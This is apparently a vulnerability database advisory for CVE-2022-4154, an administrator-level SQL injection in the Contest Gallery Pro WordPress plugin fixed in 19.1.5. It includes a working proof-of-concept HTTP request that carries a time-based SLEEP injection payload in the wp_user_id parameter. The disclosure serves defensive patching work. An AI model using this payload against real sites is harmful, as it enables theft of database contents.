WordPress Plugin Vulnerabilities

Contest Gallery Pro < 19.1.5 - Admin+ SQL Injection

Description

The plugin does not escape the wp_user_id GET parameter before concatenating it to an SQL query in management-show-user.php. This may allow malicious users with at administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site's database.

Proof of Concept

POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&users_management=true&option_id=1&edit_registration_entries=1&wp_user_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ) HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------15540990533670320912247141513
Content-Length: 355
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7Cd5b9cbd98cd7c7823a4eaafd9a2835604947bf858ba78d5e5dd7d78483c5ca16; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7C9aed4838ce07f42546cfa615b8a441061ea6a48fe19875091cb73070dad3d826; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668343335
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------15540990533670320912247141513
Content-Disposition: form-data; name="action"

post_contest_gallery_action_ajax
-----------------------------15540990533670320912247141513
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------15540990533670320912247141513--

Affects Plugins

Plugin icon
contest-gallery-pro
Fixed in 19.1.5

References

CVE
CVE-2022-4154
URL
https://bulletin.iese.de/post/contest-gallery_19-1-4-1_5

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
4.1 (medium)

Miscellaneous

Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Kunal Sharma
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
dac32ed4-d3df-420a-a2eb-9e7d2435826a

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-12-05 (about 1 years ago)
Last Updated
2022-12-05 (about 1 years ago)

Other

Published
Title
Published
2021-11-24
Title
Hide My WP < 6.2.4 - Unauthenticated SQL Injection
Published
2021-02-01
Title
WP Editor < 1.2.7 - Authenticated SQL injection
Published
2023-11-06
Title
Icons Font Loader < 1.1.2.1 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Published
2023-01-11
Title
Hide My WP < 6.2.9 - Unauthenticated SQLi
Published
2014-08-01
Title
Adserve 0.2 - adclick.php SQL Injection Exploit